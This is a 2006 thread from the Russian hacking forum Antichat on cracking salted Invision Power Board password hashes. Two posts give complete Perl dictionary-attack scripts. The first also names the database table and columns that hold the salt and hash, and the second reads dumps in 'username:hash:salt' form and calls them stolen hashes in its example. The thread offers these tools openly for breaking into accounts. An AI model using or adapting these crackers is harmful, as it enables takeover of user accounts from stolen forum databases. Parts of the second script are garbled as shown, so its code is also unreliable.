ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Расшифровка хешей
Перезагрузить страницу Скрипт для брута солёных хэшэй
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.01.2006, 04:54
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию
вот есть такая байда на перле для взлома соленых хэшей по словарю от IPB
Код:
#!/usr/bin/perl -w 
# Functional style 

use Digest::MD5 qw(md5_hex); 
    $SIG{'INT'} = 'CLEANUP'; 

if (@ARGV < 4) { &usage; } 

$salt       = $ARGV[0]; 
$pass_hash  = $ARGV[1]; 
$wordlist   = $ARGV[2]; 
$statename  = $ARGV[3]; 

$output    = $statename . "_output.txt"; 
$salt_hash = md5_hex($salt); 


open(INDICT, $wordlist) or die "Can't read " . $wordlist . "\n"; 

print "\nCTRL+C to save state\n\nRunning...\n"; 

print "Reading " . $wordlist . " into memory..\n"; 
@lines = <INDICT>; 

print "\n Attempting to crack password..\n"; 
my $array_element; 
   foreach $array_element(@lines) 
   { 
   $line = $array_element; 
   chomp $line; 
   $cpass = md5_hex($line); 
   $hybridhash = $salt_hash . $cpass; 
   $current_hash = md5_hex($hybridhash); 
      if ($current_hash eq $pass_hash) 
      { 
      open(PASS_FOUND,">> $output") or die "Can't write to " . $output . "\n"; 
      print PASS_FOUND "---START---\nPassword acquired for " . $cpass . ":\n" . $line . "\n----END----\n"; 
      close PASS_FOUND; 
      print "---PASSWORD FOUND FOR HASH---\n" . $pass_hash . "\n" . $line . "\n"; 
      exit(); 
      } #end If 

   } #End While 

close INDICT; 

sub usage() 
{ 
print q( 
Invision Power Board v < 2.0.4 pass_hash Cracker 
---------------------------------------------------- 
USAGE: 
~~~~~~ 
ipb_cracker.pl [PSALT] [PHASH] [WLIST] [SNAME] 

[PSALT] - Salt for the password 
[PHASH] - Password Hash 
[WLIST] - Wordlist file to use 
[SNAME] - Name for this attempt 

Note: 
PSALT & PHASH can be found in: 
TABLE -ibf_members_converge 
ROWS  |- converge_pass_salt 
      |- converge_pass_hash 

e.g. ipb_cracker.pl Kl2op c6d6bd7ebf80f20f6f4db words.txt n0oBXpLoit3r 
---------------------------------------------------- 


); 
exit(); 
} 
    sub CLEANUP { 
   print "\n\nCaught Interrupt (^C), Aborting\n"; 
   exit(1); 
    }
Добавлено qBiN'ом:
В следущий раз постим скрипты в тегах если нужна подсветка то в
Последний раз редактировалось qBiN; 05.01.2006 в 19:41..
 
Ответить с цитированием

  #2  
Старый 05.01.2006, 07:33
rent0n
Участник форума
Регистрация: 25.12.2005
Сообщений: 146
Провел на форуме:
123219

Репутация: 36
По умолчанию
Ну, брут на перле не так уж и сложно написать, имхо
 
Ответить с цитированием

  #3  
Старый 05.01.2006, 15:05
FHT
Постоянный
Регистрация: 21.09.2005
Сообщений: 525
Провел на форуме:
2994394

Репутация: 547


Отправить сообщение для FHT с помощью ICQ
По умолчанию
Скорость брута будет низкой, ИМХО...
Если бы кто рассказал как на Дельфях в 5-10-25 потоков работать, я бы написал переборшик соленых хешей с приемлемой скоростью перебора...
 
Ответить с цитированием

  #4  
Старый 05.01.2006, 17:15
DetMyl
Участник форума
Регистрация: 17.12.2005
Сообщений: 121
Провел на форуме:
551495

Репутация: 227
По умолчанию
Вот мой вариант... попроще будет ( может и немного быстрее поэтому ), да и ему можно файл с хэшами:солью скормить...

PHP код:
# This is a very simple perl brutforcer for IPb  MD5 hashes,
# coded with md5_hex(md5_hex($salt).md5_hex($pass)) algorithm.
# For usage you need a dictionary file and file with hashes (:-))
# Hashes have to be in this form: "username:hash:salt"
# Good Luck!
#
#
# (c)DetMyl 04.01.2006, Detmyl@bk.ru



if (@ARGV 2)
 {
 print q(
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 Usageperl vB_hash.pl [dictionary file] [username:hash:salt file
 I.e. : perl vB_hash.pl someBigDitionary.dic spizhzhenyeHashy.md5
 +++++++++++++++++++++++++++++++++++++++++++++++++++
           );
 exit;
 }

 use Digest::MD5 'md5_hex';

 $dictfile $ARGV[0];
 $hashSaltFile = ($ARGV[1ne '') ? $ARGV[1] : $ARGV[0];
    
  open (HASHFILE$hashSaltFile) || die "couldn't open the file $hashSaltFile";
   

   while ($hashes = <HASHFILE>) {
       ($user,$hash,$salt) = split(/:/, $hashes);
        $salt =~ s/\n//;
        if ( $hash eq  md5_hexmd5_hex($salt).md5_hex($user) ) ) { print "FOUND!!! user: ".$user." pass:".$user."\n";next#check with username
        open (DICTFILE$dictfile) || die "couldn't open the file $dictfile";
       while ($words = <DICTFILE>) {
            $words =~ s/\n//;
                if ( $hash eq  md5_hexmd5_hex($salt).md5_hex($words) ) ) { print "FOUND!!! user: ".$user." pass:".$words."\n"last;}
                            
        }
      close(DICTFILE);
      
      }
   close(HASHFILE); 
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ